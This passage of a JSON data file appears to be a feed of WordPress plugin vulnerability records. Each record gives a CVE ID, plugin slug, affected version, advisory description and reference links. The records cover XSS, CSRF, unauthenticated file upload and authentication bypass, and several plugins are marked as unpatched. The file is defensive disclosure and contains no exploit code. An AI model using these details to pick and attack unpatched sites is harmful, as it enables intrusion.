link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ca28c91-f75e-4691-91cf-459cc9da5ad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ca28c91-f75e-4691-91cf-459cc9da5ad8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1497","slug":"themeisle-companion","versionImpact":"2.10.30","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form widget addr2_width attribute in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4603b58-0972-4e04-91ac-ffc846964722?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4603b58-0972-4e04-91ac-ffc846964722?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.30\\\/vendor\\\/codeinwp\\\/themeisle-content-forms\\\/includes\\\/widgets-admin\\\/elementor\\\/elementor_widget_base.php#L1219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.30\\\/vendor\\\/codeinwp\\\/themeisle-content-forms\\\/includes\\\/widgets-admin\\\/elementor\\\/elementor_widget_base.php#L1219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2019","slug":"wp-db-table-editor","versionImpact":"1.8.4","description":"The WP-DB-Table-Editor plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to lack of a default capability requirement on the 'dbte_render' function in all versions up to, and including, 1.8.4. This makes it possible for authenticated attackers, with contributor access and above, to modify database tables that the theme has been configured to use the plugin to edit.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d044e0a-a956-4319-985d-6a9a276daf49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d044e0a-a956-4319-985d-6a9a276daf49?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-db-table-editor\\\/trunk\\\/db-table-editor.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-db-table-editor\\\/trunk\\\/db-table-editor.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6588","slug":"powerpress","versionImpact":"11.9.10","description":"The PowerPress Podcasting plugin by Blubrry plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018media_url\u2019 parameter in all versions up to, and including, 11.9.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/745262f6-4f73-453e-b650-15115536f221?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/745262f6-4f73-453e-b650-15115536f221?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/trunk\\\/powerpress-player.php#L1015\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/trunk\\\/powerpress-player.php#L1015\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/powerpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/powerpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115881\\\/#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115881\\\/#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7380","slug":"cf-geoplugin","versionImpact":"8.6.9","description":"The Geo Controller plugin for WordPress is vulnerable to unauthorized menu creation\/deletion due to missing capability checks on the ajax__geolocate_menu and ajax__geolocate_remove_menu functions in all versions up to, and including, 8.6.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create or delete WordPress menus.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/280e1b4d-08be-4e77-abcb-5f9079111595?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/280e1b4d-08be-4e77-abcb-5f9079111595?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Menus.php#L519\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Menus.php#L519\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Menus.php#L606\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Menus.php#L606\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10586","slug":"debug-tool","versionImpact":"2.2","description":"The Debug Tool plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the dbt_pull_image() function and missing file type validation in all versions up to, and including, 2.2. This makes it possible for unauthenticated attackers to create arbitrary files such as .php files that can be leveraged for remote code execution.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e9d5c93-dcd7-450e-8c52-5c95fc5473d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e9d5c93-dcd7-450e-8c52-5c95fc5473d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-tool\\\/trunk\\\/tools\\\/image-puller.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-tool\\\/trunk\\\/tools\\\/image-puller.php#L120\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12461","slug":"wp-revive-adserver","versionImpact":"2.2.1","description":"The WP-Revive Adserver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprevive_async' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-revive-adserver\\\/trunk\\\/src\\\/Inc\\\/WPReviveShortcodes.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-revive-adserver\\\/trunk\\\/src\\\/Inc\\\/WPReviveShortcodes.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-revive-adserver\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-revive-adserver\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/649545c8-e6a2-4587-a439-17081f389d46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/649545c8-e6a2-4587-a439-17081f389d46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10815","slug":"postlists","versionImpact":"2.0.2","description":"The PostLists WordPress plugin through 2.0.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309a445a-6261-4bd1-bac0-a78096d0c12b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309a445a-6261-4bd1-bac0-a78096d0c12b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309a445a-6261-4bd1-bac0-a78096d0c12b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309a445a-6261-4bd1-bac0-a78096d0c12b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8425","slug":"woocommerce-ultimate-gift-card","versionImpact":"2.6.0","description":"The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-ultimate-gift-card\\\/19191057\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-ultimate-gift-card\\\/19191057\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ebffb82-7455-40c9-9ffd-b78e0e73e431?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ebffb82-7455-40c9-9ffd-b78e0e73e431?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31035","slug":"wp-editormd","versionImpact":"10.2.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Benjamin Chris WP Editor.md \u2013 The Perfect WordPress Markdown Editor allows Stored XSS. This issue affects WP Editor.md \u2013 The Perfect WordPress Markdown Editor: from n\/a through 10.2.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-editormd\\\/vulnerability\\\/wordpress-wp-editor-md-the-perfect-wordpress-markdown-editor-10-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-editormd\\\/vulnerability\\\/wordpress-wp-editor-md-the-perfect-wordpress-markdown-editor-10-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4610","slug":"wp-members","versionImpact":"3.5.2","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpmem_user_memberships shortcode in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.2\\\/includes\\\/class-wp-members-products.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.2\\\/includes\\\/class-wp-members-products.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.2\\\/includes\\\/class-wp-members-products.php#L660\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.2\\\/includes\\\/class-wp-members-products.php#L660\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwp-members&old=3240295&new_path=%2Fwp-members&new=3293207&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwp-members&old=3240295&new_path=%2Fwp-members&new=3293207&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-members\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-members\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ff96d74-8f20-49a6-bd02-0bfe3498b599?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ff96d74-8f20-49a6-bd02-0bfe3498b599?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5289","slug":"interactive-3d-flipbook-powered-physics-engine","versionImpact":"1.16.15","description":"The 3D FlipBook \u2013 PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018style\u2019 and 'mode' parameters in all versions up to, and including, 1.16.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: This issue affects only block-based themes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interactive-3d-flipbook-powered-physics-engine\\\/trunk\\\/inc\\\/shortcode.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interactive-3d-flipbook-powered-physics-engine\\\/trunk\\\/inc\\\/shortcode.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interactive-3d-flipbook-powered-physics-engine\\\/trunk\\\/inc\\\/shortcode.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interactive-3d-flipbook-powered-physics-engine\\\/trunk\\\/inc\\\/shortcode.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315198\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315198\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/interactive-3d-flipbook-powered-physics-engine\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/interactive-3d-flipbook-powered-physics-engine\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b76475-5215-47fd-badf-e2c542b25d4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b76475-5215-47fd-badf-e2c542b25d4b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7692","slug":"orion-login-with-sms","versionImpact":"1.0.5","description":"The Orion Login with SMS plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.5. This is due to the olws_handle_verify_phone() function not utilizing a strong enough OTP value, exposing the hash needed to generate the OTP value, and no restrictions on the number of attempts to submit the code. This makes it possible for unauthenticated attackers to log in as other users, including administrators, if they have access to their phone number.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/orion-login-with-sms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/orion-login-with-sms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31a47cbd-c19b-4ac3-87ed-2d4c5c0e9cb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31a47cbd-c19b-4ac3-87ed-2d4c5c0e9cb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1431","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"4.6.3","description":"The WP Simple Shopping Cart plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.6.3 due to the plugin saving shopping cart data exports in a publicly accessible location (\/wp-content\/plugins\/wordpress-simple-paypal-shopping-cart\/includes\/admin\/). This makes it possible for unauthenticated attackers to view information that should be limited to administrators only and can include data like first name, last name, email, address, IP Address, and more.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea4453bc-557b-4abf-85c6-4aecfd8f4012?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea4453bc-557b-4abf-85c6-4aecfd8f4012?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2878855%40wordpress-simple-paypal-shopping-cart&new=2878855%40wordpress-simple-paypal-shopping-cart&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2878855%40wordpress-simple-paypal-shopping-cart&new=2878855%40wordpress-simple-paypal-shopping-cart&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2452","slug":"advanced-woo-search","versionImpact":"2.77","description":"The Advanced Woo Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.77 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.77\\\/includes\\\/admin\\\/class-aws-admin-options.php#L473\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.77\\\/includes\\\/admin\\\/class-aws-admin-options.php#L473\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4278e9d7-aa1e-47a5-b715-09dae5156303?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4278e9d7-aa1e-47a5-b715-09dae5156303?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.77\\\/includes\\\/admin\\\/class-aws-admin-options.php#L481\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.77\\\/includes\\\/admin\\\/class-aws-admin-options.php#L481\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1910","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxClearCategory function. This makes it possible for unauthenticated attackers to clear categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1c2712d-0865-4759-98da-1e11a26f2466?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1c2712d-0865-4759-98da-1e11a26f2466?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1489","slug":"sms-alert","versionImpact":"3.6.9","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.9. This is due to missing or incorrect nonce validation on the processBulkAction function. This makes it possible for unauthenticated attackers to delete pages and posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7a28382-facb-43a7-892a-8ca9e7f0f62b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7a28382-facb-43a7-892a-8ca9e7f0f62b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3039989%40sms-alert%2Ftrunk&old=3032487%40sms-alert%2Ftrunk&sfp_email=&sfph_mail=#file19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3039989%40sms-alert%2Ftrunk&old=3032487%40sms-alert%2Ftrunk&sfp_email=&sfph_mail=#file19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1718","slug":"woocommerce-checkout-cielo","versionImpact":"1.1.0","description":"The Claudio Sanches \u2013 Checkout Cielo for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to insufficient payment validation in the update_order_status() function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to update the status of orders to paid bypassing payment.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40cb3214-a11b-4bee-9422-256d12303460?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40cb3214-a11b-4bee-9422-256d12303460?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-checkout-cielo\\\/trunk\\\/includes\\\/class-wc-checkout-cielo-gateway.php#L296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-checkout-cielo\\\/trunk\\\/includes\\\/class-wc-checkout-cielo-gateway.php#L296\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7485","slug":"traffic-manager","versionImpact":"1.4.5","description":"The Traffic Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page' parameter in the 'UserWebStat' AJAX function in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2f508f1-45a0-4cb4-9d67-51edd3d74abe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2f508f1-45a0-4cb4-9d67-51edd3d74abe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-manager\\\/trunk\\\/traffic-manager.php?rev=1709967#L2745\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-manager\\\/trunk\\\/traffic-manager.php?rev=1709967#L2745\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-manager\\\/trunk\\\/traffic-manager.php?rev=1709967#L2375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-manager\\\/trunk\\\/traffic-manager.php?rev=1709967#L2375\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4529","slug":"security-antivirus-firewall","versionImpact":"2.3.5","description":"The Security, Antivirus, Firewall \u2013 S.A.F plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.3.5. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address from logging in.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd177a43-6059-4125-9408-1090b9a54117?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd177a43-6059-4125-9408-1090b9a54117?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-antivirus-firewall\\\/trunk\\\/includes\\\/wptsafEnv.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-antivirus-firewall\\\/trunk\\\/includes\\\/wptsafEnv.php#L68\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9241","slug":"pdf-image-generator","versionImpact":"1.5.6","description":"The PDF Image Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1454af30-319a-44b7-a83e-2d774cfbc8d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1454af30-319a-44b7-a83e-2d774cfbc8d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-image-generator\\\/tags\\\/1.5.6\\\/pdf-image-generator.php#L329\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-image-generator\\\/tags\\\/1.5.6\\\/pdf-image-generator.php#L329\",\"refsource\":\"\",\"tags\":[]}]"}
